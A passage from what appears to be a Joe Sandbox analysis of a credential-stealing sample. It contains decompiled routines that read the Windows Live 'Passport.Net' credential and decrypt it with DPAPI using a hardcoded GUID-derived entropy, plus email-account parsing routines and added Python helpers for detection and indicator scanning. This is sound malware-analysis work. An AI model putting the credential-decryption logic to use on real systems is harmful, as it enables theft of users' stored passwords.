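The function above is easier to read once the raw SendMessageA message numbers are resolved: 0x1009, 0x1036, 0x101c and 0x1019 are LVM_DELETEALLITEMS, LVM_SETEXTENDEDLISTVIEWSTYLE, LVM_DELETECOLUMN and LVM_GETCOLUMNA from commctrl.h, so E0040559F clears a list view, enables check boxes and full-row selection, and then copies the header text of every column into the list (a column-chooser dialog, consistent with the bundled password-recovery tooling the Yara hits in this report point to). The following script is an added analyst helper, not part of the Joe Sandbox report or of the sample: it parses a decompiled listing for SendMessageA calls and annotates them with the public LVM_ and LVS_EX_ constant names. The embedded SAMPLE is an excerpt copied from the pseudocode above; the constant values are the standard commctrl.h values, nothing else is assumed.

```python
"""Annotate SendMessageA calls in decompiled pseudocode with ListView
(LVM_*) message names and LVS_EX_* style flags.

Added analysis helper; not code from the sample or the sandbox report.
Constant values are the public ones from commctrl.h (LVM_FIRST = 0x1000).
"""
import re

LVM_FIRST = 0x1000
LVM_MESSAGES = {
    LVM_FIRST + 4:  "LVM_GETITEMCOUNT",
    LVM_FIRST + 6:  "LVM_SETITEMA",
    LVM_FIRST + 7:  "LVM_INSERTITEMA",
    LVM_FIRST + 9:  "LVM_DELETEALLITEMS",
    LVM_FIRST + 25: "LVM_GETCOLUMNA",
    LVM_FIRST + 27: "LVM_INSERTCOLUMNA",
    LVM_FIRST + 28: "LVM_DELETECOLUMN",
    LVM_FIRST + 43: "LVM_SETITEMSTATE",
    LVM_FIRST + 44: "LVM_GETITEMSTATE",
    LVM_FIRST + 54: "LVM_SETEXTENDEDLISTVIEWSTYLE",
}
LVS_EX_FLAGS = {
    0x01: "LVS_EX_GRIDLINES",
    0x02: "LVS_EX_SUBITEMIMAGES",
    0x04: "LVS_EX_CHECKBOXES",
    0x08: "LVS_EX_TRACKSELECT",
    0x10: "LVS_EX_HEADERDRAGDROP",
    0x20: "LVS_EX_FULLROWSELECT",
}

# hwnd may itself contain parentheses, so skip it lazily and anchor on the
# hex message number; wParam and lParam are taken up to the closing paren.
CALL_RE = re.compile(
    r"SendMessageA\(.*?,\s*(0x[0-9a-fA-F]+)\s*,\s*([^,]+?)\s*,\s*(.*?)\)"
)

# Constructed sample: excerpt of the E0040559F pseudocode in this report.
SAMPLE = """
SendMessageA(_t53, 0x1009, 0, 0);
SendMessageA(_v12, 0x1036, 0, 0x26);
} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) {
"""


def decode_flags(value, table):
    """Expand a bit mask into '|'-joined names; unknown bits stay as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return " | ".join(names) or "0"


def annotate(listing):
    """Return one record per SendMessageA call found in the listing."""
    calls = []
    for line in listing.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue
        msg = int(m.group(1), 16)
        rec = {
            "msg": msg,
            "name": LVM_MESSAGES.get(msg, "0x%04x (not in table)" % msg),
            "wparam": m.group(2),
            "lparam": m.group(3),
        }
        # Only the extended-style message carries a flag mask in lParam.
        if msg == LVM_FIRST + 54 and rec["lparam"].startswith("0x"):
            rec["note"] = decode_flags(int(rec["lparam"], 16), LVS_EX_FLAGS)
        calls.append(rec)
    return calls


def classify(calls):
    """Name the pattern: clear items and columns, then read column headers."""
    names = {c["name"] for c in calls}
    if {"LVM_DELETEALLITEMS", "LVM_DELETECOLUMN", "LVM_GETCOLUMNA"} <= names:
        return "listview-rebuild"
    return "unclassified"


if __name__ == "__main__":
    for c in annotate(SAMPLE):
        print("%-30s wParam=%-6s lParam=%-8s %s"
              % (c["name"], c["wparam"], c["lparam"], c.get("note", "")))
    print(classify(annotate(SAMPLE)))
```

Run it against any other function in this report that calls SendMessageA; a message number outside the table is reported as hex rather than guessed, and the LVM_GETCOLUMNA record shows the wParam (column index, here _v16) and the lParam (the LVCOLUMN structure at &_v64, whose mask of 4 is LVCF_TEXT).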

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                    • Opcode ID: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                                                                                                    • Instruction ID: c9ec69d2b7f122f2474fbd4df523f5fea2365e5f162f49a3354b930d279265bd
                                                                                                                                                    • Opcode Fuzzy Hash: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                                                                                                    • Instruction Fuzzy Hash: 304126B5D00109AFDB209F99DC81DAEBBB9FF04348F00846AE918B7291D7759E50CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                    			E0040D5DB(char* __ebx, void* __eflags) {
                                                                                                                                                    				char _v8;
                                                                                                                                                    				short* _v12;
                                                                                                                                                    				int _v16;
                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                    				char _v24;
                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                    				char _v32;
                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                    				int _v56;
                                                                                                                                                    				char _v60;
                                                                                                                                                    				char _v584;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t36;
                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                    				void* _t47;
                                                                                                                                                    				char _t63;
                                                                                                                                                    				int _t69;
                                                                                                                                                    				void* _t74;
                                                                                                                                                    
                                                                                                                                                    				_t74 = __eflags;
                                                                                                                                                    				_t69 = 0;
                                                                                                                                                    				E004046D7( &_v584);
                                                                                                                                                    				_v60 = 0;
                                                                                                                                                    				_v56 = 0;
                                                                                                                                                     				_t36 = E00404647( &_v60, 0, _t74); // resolves advapi32!CredReadA, CredFree, CredDeleteA, CredEnumerateA, CredEnumerateW into the _v60 table (subcall 00404647 in the API list below)
                                                                                                                                                     				_t75 = _t36;
                                                                                                                                                     				if(_t36 != 0 && E004047A0( &_v584, _t75) != 0) { // second LoadLibraryA/GetProcAddress pair; the library and export name are not resolved in this listing
                                                                                                                                                     					_push( &_v8);              // PCREDENTIALA* out-pointer
                                                                                                                                                     					_push(0);                  // Flags = 0
                                                                                                                                                     					_push(4);                  // Type = 4 = CRED_TYPE_DOMAIN_VISIBLE_PASSWORD
                                                                                                                                                     					_push("Passport.Net\\*"); // TargetName of the Windows Live ID (.NET Passport) credential
                                                                                                                                                     					if(_v52() != 0) { // argument order matches CredReadA(TargetName, Type, Flags, &pCredential), the first export resolved by 00404647
                                                                                                                                                    						_t44 = _v8;
                                                                                                                                                     						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) { // CREDENTIALA: +0x30 UserName, +0x18 CredentialBlobSize
                                                                                                                                                     							_v32 =  *((intOrPtr*)(_t44 + 0x18)); // DATA_BLOB.cbData = CredentialBlobSize
                                                                                                                                                     							_v28 =  *((intOrPtr*)(_t44 + 0x1c)); // DATA_BLOB.pbData = CredentialBlob (+0x1c)
                                                                                                                                                    							_t47 = 0;
                                                                                                                                                     							_t63 = 0x4a; // 74 bytes = 37 UTF-16 code units, including the terminating NUL
                                                                                                                                                     							do { // derive the DPAPI optional entropy: every UTF-16 unit of the GUID string shifted left by 2, stored as a word at 0x417768
                                                                                                                                                     								_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
                                                                                                                                                     								 *(_t47 + 0x417768) =  *_t14 << 2;
                                                                                                                                                     								_t47 = _t47 + 2;
                                                                                                                                                     							} while (_t47 < _t63);
                                                                                                                                                     							_v24 = _t63;      // entropy DATA_BLOB.cbData = 0x4a
                                                                                                                                                     							_v20 = 0x417768;  // entropy DATA_BLOB.pbData (the "hwA" in the String ID below is this address read as ASCII)
                                                                                                                                                     							if(E00404811( &_v584,  &_v32,  &_v24,  &_v16) != 0) { // (pDataIn, pOptionalEntropy, pDataOut) is consistent with a CryptUnprotectData wrapper around the export resolved by 004047A0; not confirmed by this listing
                                                                                                                                                     								if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) { // decrypted UTF-16 password -> ANSI at out+0x100
                                                                                                                                                     									strcpy(__ebx,  *(_v8 + 0x30)); // UserName -> out+0
                                                                                                                                                     									_t69 = 1;
                                                                                                                                                     								}
                                                                                                                                                     								LocalFree(_v12); // free the decrypted output buffer
                                                                                                                                                    							}
                                                                                                                                                    							_t44 = _v8;
                                                                                                                                                    						}
                                                                                                                                                     						_v48(_t44); // CredFree(pCredential), the second export resolved by 00404647
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				E004046C2( &_v60);
                                                                                                                                                    				E004047F1( &_v584);
                                                                                                                                                    				return _t69;
                                                                                                                                                    			}

                                                                                                                                                     Instruction addresses for the decompiled statements above, in listing order (0x0040d5db to 0x0040d6fa): 0x0040d5db, 0x0040d5ec, 0x0040d5ee, 0x0040d5f6, 0x0040d5f9, 0x0040d5fc, 0x0040d601, 0x0040d603, 0x0040d619, 0x0040d61a, 0x0040d61b, 0x0040d61d, 0x0040d627, 0x0040d62d, 0x0040d633, 0x0040d645, 0x0040d64d, 0x0040d650, 0x0040d652, 0x0040d653, 0x0040d653, 0x0040d65e, 0x0040d666, 0x0040d667, 0x0040d67d, 0x0040d680, 0x0040d68e, 0x0040d6af, 0x0040d6c8, 0x0040d6d1, 0x0040d6d1, 0x0040d6d5, 0x0040d6d5, 0x0040d6db, 0x0040d6db, 0x0040d6df, 0x0040d6df, 0x0040d627, 0x0040d6e5, 0x0040d6f0, 0x0040d6fa

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                                                                      • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7554F420), ref: 00404654
                                                                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                                                                                      • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                                                                      • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                                                                                                    • strlen.MSVCRT ref: 0040D6B7
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                    • String ID: Passport.Net\*$hwA
                                                                                                                                                    • API String ID: 3335197805-2625321100
                                                                                                                                                    • Opcode ID: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                                                                                                    • Instruction ID: 2e6419ae4a5a1056fcde8d8ccc48918818cbcf4cd0f285746335566170a6875e
                                                                                                                                                    • Opcode Fuzzy Hash: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                                                                                                    • Instruction Fuzzy Hash: D4315C76D00109ABCB10EF96D9449EEB7BDEF84300F10047AF605E7291DB399A45CB68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
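The routine above reads the Windows Live ID credential stored under the target name Passport.Net\* and unprotects its blob with DPAPI entropy derived from the GUID string in the loop. As an added example (not code from the sample, from NirSoft, or from Joe Sandbox), the Python below reproduces that entropy derivation and turns the routine's artifacts into memory-scan indicators: the ASCII target string and the UTF-16 seed string are static indicators that the routine is present in an unpacked image, while the derived 74-byte entropy only exists in memory once the loop has run (at 0x417768 in this sample), so finding it in a dump shows the routine executed. The function names, the constructed dump buffers and the classification labels are assumptions made for the example.

```python
"""Indicators for the Passport.Net credential-recovery routine at 0x0040d5db.

Added example; not code from the sample or from the sandbox report.
"""
import struct
import sys

# Entropy seed taken from the decompiled loop (L"82BD0E67-...").
PASSPORT_ENTROPY_SEED = "82BD0E67-9FEA-4748-8672-D5EFE5B779B0"
# Target name passed to the Cred* call in the decompiled listing.
PASSPORT_CRED_TARGET = "Passport.Net\\*"


def derive_entropy(seed: str = PASSPORT_ENTROPY_SEED) -> bytes:
    """Mirror the do/while loop: for each UTF-16 code unit of the seed,
    including the terminating NUL (0x4a bytes = 37 units), store
    (unit << 2) as a 16-bit little-endian word. The result is the
    optional-entropy DATA_BLOB the sample hands to the DPAPI call."""
    units = seed.encode("utf-16-le") + b"\x00\x00"
    out = bytearray()
    for off in range(0, len(units), 2):
        unit = struct.unpack_from("<H", units, off)[0]
        out += struct.pack("<H", (unit << 2) & 0xFFFF)  # word store truncates
    return bytes(out)


def indicators() -> dict:
    """Byte patterns worth searching for in an unpacked image or a dump."""
    return {
        "cred_target_ascii": PASSPORT_CRED_TARGET.encode("ascii"),
        "entropy_seed_utf16": PASSPORT_ENTROPY_SEED.encode("utf-16-le"),
        "derived_entropy": derive_entropy(),
    }


def scan(blob: bytes) -> dict:
    """Report which indicators occur in the given bytes."""
    return {name: (pattern in blob) for name, pattern in indicators().items()}


def classify(blob: bytes) -> str:
    """Hypothetical triage labels: static presence vs. evidence of execution."""
    hits = scan(blob)
    if hits["derived_entropy"]:
        return "runtime: derived DPAPI entropy present (routine executed)"
    if hits["cred_target_ascii"] and hits["entropy_seed_utf16"]:
        return "static: Passport.Net credential-recovery routine present"
    return "no match"


# Constructed inputs (not real dumps): an image carrying both static strings,
# and a process dump in which the entropy buffer has been filled at runtime.
CONSTRUCTED_IMAGE = (
    b"\x00" * 16
    + PASSPORT_CRED_TARGET.encode("ascii") + b"\x00" * 8
    + PASSPORT_ENTROPY_SEED.encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 32
)
CONSTRUCTED_RUNTIME_DUMP = b"\xcc" * 8 + derive_entropy() + b"\xcc" * 8

if __name__ == "__main__":
    print("entropy:", derive_entropy().hex())
    print(classify(CONSTRUCTED_IMAGE))
    print(classify(CONSTRUCTED_RUNTIME_DUMP))
    if len(sys.argv) > 1:  # optional: scan a real dump file
        with open(sys.argv[1], "rb") as fh:
            print(classify(fh.read()))
```

Run it with a path to an unpacked image or a process dump to apply the same checks; the derived entropy is the stronger signal, because the static strings are also present in benign password-recovery tools that carry this routine, while the filled buffer only appears after the loop has run in the analysed process.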

                                                                                                                                                    C-Code - Quality: 41%
                                                                                                                                                    			E00407EFB(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
                                                                                                                                                    				int _v0;
                                                                                                                                                    				int _t26;
                                                                                                                                                    				char* _t32;
                                                                                                                                                    				int _t44;
                                                                                                                                                    				signed int _t46;
                                                                                                                                                    				signed int _t47;
                                                                                                                                                    
                                                                                                                                                    				_t38 = __ecx;
                                                                                                                                                    				_t47 = _t46 & 0xfffffff8;
                                                                                                                                                    				E004118A0(0x1040, __ecx);
                                                                                                                                                    				_t26 = GetMenuItemCount(_a8);
                                                                                                                                                    				_t44 = 0;
                                                                                                                                                    				_v0 = _t26;
                                                                                                                                                    				if(_t26 <= 0) {
                                                                                                                                                    					L13:
                                                                                                                                                    					return _t26;
                                                                                                                                                    				} else {
                                                                                                                                                    					goto L1;
                                                                                                                                                    				}
                                                                                                                                                    				do {
                                                                                                                                                    					L1:
                                                                                                                                                     					memset( &_a53, 0, 0x1000); // item text buffer
                                                                                                                                                     					_t47 = _t47 + 0xc;
                                                                                                                                                     					_a40 =  &_a52;    // MENUITEMINFOA.dwTypeData -> local buffer
                                                                                                                                                     					_a4.cbSize = 0x30;
                                                                                                                                                     					_a8 = 0x36;       // fMask = MIIM_ID | MIIM_SUBMENU | MIIM_TYPE | MIIM_DATA (the decompiler reuses the _a8 name for both fMask and the HMENU parameter)
                                                                                                                                                     					_a44 = 0x1000;    // cch
                                                                                                                                                     					_a20 = 0;         // wID
                                                                                                                                                     					_a52 = 0;
                                                                                                                                                     					_t26 = GetMenuItemInfoA(_a8, _t44, 1,  &_a4); // by position; _a8 here is the HMENU argument
                                                                                                                                                    					if(_t26 == 0) {
                                                                                                                                                    						goto L12;
                                                                                                                                                    					}
                                                                                                                                                    					if(_a52 == 0) {
                                                                                                                                                    						L10:
                                                                                                                                                     						_t55 = _a24; // hSubMenu
                                                                                                                                                     						if(_a24 != 0) { // recurse into the submenu
                                                                                                                                                    							_push(0);
                                                                                                                                                    							_push(_a24);
                                                                                                                                                    							_push(_a4.cbSize);
                                                                                                                                                    							_t26 = E00407EFB(_t38, _t55);
                                                                                                                                                    							_t47 = _t47 + 0xc;
                                                                                                                                                    						}
                                                                                                                                                    						goto L12;
                                                                                                                                                    					}
                                                                                                                                                     					_t32 = strchr( &_a52, 9); // cut the accelerator text after the tab
                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                    						 *_t32 = 0;
                                                                                                                                                    					}
                                                                                                                                                    					_t33 = _a20;
                                                                                                                                                    					if(_a24 != 0) {
                                                                                                                                                     						if(_a12 == 0) { // fType == MFT_STRING
                                                                                                                                                    							 *0x4171b4 =  *0x4171b4 + 1;
                                                                                                                                                    							_t33 =  *0x4171b4 + 0x11558;
                                                                                                                                                    							__eflags =  *0x4171b4 + 0x11558;
                                                                                                                                                    						} else {
                                                                                                                                                    							_t18 = _t44 + 0x11171; // 0x11171
                                                                                                                                                    							_t33 = _t18;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t26 = E00407EC3(_t33,  &_a52);
                                                                                                                                                    					_pop(_t38);
                                                                                                                                                    					goto L10;
                                                                                                                                                    					L12:
                                                                                                                                                    					_t44 = _t44 + 1;
                                                                                                                                                    				} while (_t44 < _v0);
                                                                                                                                                    				goto L13;
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                    • String ID: 0$6
                                                                                                                                                    • API String ID: 2300387033-3849865405
                                                                                                                                                    • Opcode ID: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                                                                                                    • Instruction ID: e6a74f55cf859b5146a282672b091174d688b167a10cd96a0b5acbf0203f559b
                                                                                                                                                    • Opcode Fuzzy Hash: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                                                                                                    • Instruction Fuzzy Hash: B821917190C381AFD7109F21D88199BBBE8FB84348F44897FF68496290E779E944CB5B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 66%
                                                                                                                                                    			E004044DA(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                    				char _v280;
                                                                                                                                                    				char _v408;
                                                                                                                                                    				intOrPtr _v412;
                                                                                                                                                    				char _v668;
                                                                                                                                                    				char _v796;
                                                                                                                                                    				intOrPtr _v800;
                                                                                                                                                    				char _v928;
                                                                                                                                                    				char _v940;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t37;
                                                                                                                                                    				void* _t44;
                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                    				void* _t56;
                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                    				void* _t63;
                                                                                                                                                    
                                                                                                                                                    				_t63 = __fp0;
                                                                                                                                                    				_t50 = __ecx;
                                                                                                                                                    				_v8 = __ecx;
                                                                                                                                                    				E004021D8( &_v940);
                                                                                                                                                    				_t58 = _a4;
                                                                                                                                                    				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
                                                                                                                                                    				_push(_t58 + 0x404);
                                                                                                                                                    				_t44 = 0x7f;
                                                                                                                                                    				E004060D0(_t44,  &_v796);
                                                                                                                                                    				E004060D0(_t44,  &_v408, _t58 + 0x204);
                                                                                                                                                    				E004060D0(_t44,  &_v928, _t58 + 4);
                                                                                                                                                    				E004060D0(_t44,  &_v668, _t58 + 0x104);
                                                                                                                                                    				_t37 = E004060D0(_t44,  &_v280, _t58 + 0x304);
                                                                                                                                                    				_t56 = _t58 + 0x504;
                                                                                                                                                    				_push("pop3");
                                                                                                                                                    				_push(_t56);
                                                                                                                                                    				L004115B2();
                                                                                                                                                    				if(_t37 != 0) {
                                                                                                                                                    					_push("imap");
                                                                                                                                                    					_push(_t56);
                                                                                                                                                    					L004115B2();
                                                                                                                                                    					if(_t37 != 0) {
                                                                                                                                                    						_push("smtp");
                                                                                                                                                    						_push(_t56);
                                                                                                                                                    						L004115B2();
                                                                                                                                                    						if(_t37 == 0) {
                                                                                                                                                    							_v412 = 4;
                                                                                                                                                    						}
                                                                                                                                                    					} else {
                                                                                                                                                    						_v412 = 2;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					_v412 = 1;
                                                                                                                                                    				}
                                                                                                                                                    				_v24 =  *((intOrPtr*)(_t58 + 0x804));
                                                                                                                                                    				_v20 =  *((intOrPtr*)(_t58 + 0x808));
                                                                                                                                                    				return E00402407( &_v940, _t63, _v8 + 0xfffffe38);
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                                                                      • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                                                                                    • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 0040456B
                                                                                                                                                    • _stricmp.MSVCRT(?,imap), ref: 00404589
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _stricmp$memcpystrlen
                                                                                                                                                    • String ID: imap$pop3$smtp
                                                                                                                                                    • API String ID: 445763297-821077329
                                                                                                                                                    • Opcode ID: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                                                                                                    • Instruction ID: 85134e65636b23d23915c58aa006eeb0f313b09a76600224a93e2cbe40a0dcf5
                                                                                                                                                    • Opcode Fuzzy Hash: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                                                                                                    • Instruction Fuzzy Hash: 8F2174B2500318ABC711DB61CD41BDBB3FDAF50314F10056BE64AB3181DBB87B858B9A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			// Decompiled by the Joe Sandbox IDA plugin; the comments describe what the listing itself does.
                                                                                                                                                    			E004036CC(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
                                                                                                                                                    				char _v5;
                                                                                                                                                    				char _v132;    // buffer filled by E0040E906 (see the subcall APIs listed below)
                                                                                                                                                    				char _v404;    // text after the ':' separator
                                                                                                                                                    				char _v532;    // text before the ':' separator (account name)
                                                                                                                                                    				intOrPtr _v536;
                                                                                                                                                    				char _v920;    // account name with "@gmail.com" appended
                                                                                                                                                    				intOrPtr _v924;
                                                                                                                                                    				char _v1052;   // second copy of the account name
                                                                                                                                                    				char _v1064;   // record handed to E00402407
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* _t18;
                                                                                                                                                    				char* _t20;
                                                                                                                                                    				char* _t39;
                                                                                                                                                    				char* _t41;
                                                                                                                                                    				void* _t48;
                                                                                                                                                    				void* _t59;
                                                                                                                                                    
                                                                                                                                                    				_t59 = __fp0;
                                                                                                                                                    				_t48 = __edi;
                                                                                                                                                    				if( *((intOrPtr*)(__edi + 0x888)) == 0) {
                                                                                                                                                    					return _t18; // decompiler artifact: _t18 is never assigned, eax is returned unchanged
                                                                                                                                                    				}
                                                                                                                                                    				_t39 =  &_v132;
                                                                                                                                                    				_t20 = E0040E906(_t39, __edi + 0x87c, _a4); // subcall uses UuidFromStringA, memcpy, CoTaskMemFree
                                                                                                                                                    				if(_t20 != 0) {
                                                                                                                                                    					_v5 = 0;
                                                                                                                                                    					_t20 = strchr(_t39, 0x3a); // locate the ':' separator
                                                                                                                                                    					_t41 = _t20;
                                                                                                                                                    					if(_t41 != 0) {
                                                                                                                                                    						 *_t41 = 0; // split the string in place at ':'
                                                                                                                                                    						E004021D8( &_v1064); // initialise the record
                                                                                                                                                    						strcpy( &_v404,  &(_t41[1])); // part after ':'
                                                                                                                                                    						strcpy( &_v532,  &_v132);     // part before ':'
                                                                                                                                                    						_v924 = 7;
                                                                                                                                                    						_v536 = 3;
                                                                                                                                                    						if(strlen( &_v532) + 0xa < 0x7f) { // name plus "@gmail.com" must fit the 0x7f-byte field
                                                                                                                                                    							sprintf( &_v920, "%s@gmail.com",  &_v532);
                                                                                                                                                    						}
                                                                                                                                                    						strcpy( &_v1052,  &_v532);
                                                                                                                                                    						_t20 = E00402407( &_v1064, _t59, _t48); // pass the completed record on
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				return _t20;
                                                                                                                                                    			}
                                                                                                                                                    
                                                                                                                                                    Listing addresses (per-statement address column of the C-code listing above, spilled out of the table): 0x004036cc through 0x004037ae

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                                                                                                      • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                                                                                                      • Part of subcall function 0040E906: memcpy.MSVCRT ref: 0040E966
                                                                                                                                                      • Part of subcall function 0040E906: CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                                                                                                    • strchr.MSVCRT ref: 00403706
                                                                                                                                                    • strcpy.MSVCRT(?,00000001,?,?,?), ref: 0040372F
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 0040373F
                                                                                                                                                    • strlen.MSVCRT ref: 0040375F
                                                                                                                                                    • sprintf.MSVCRT ref: 00403783
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 00403799
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                    • String ID: %s@gmail.com
                                                                                                                                                    • API String ID: 2649369358-4097000612
                                                                                                                                                    • Opcode ID: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
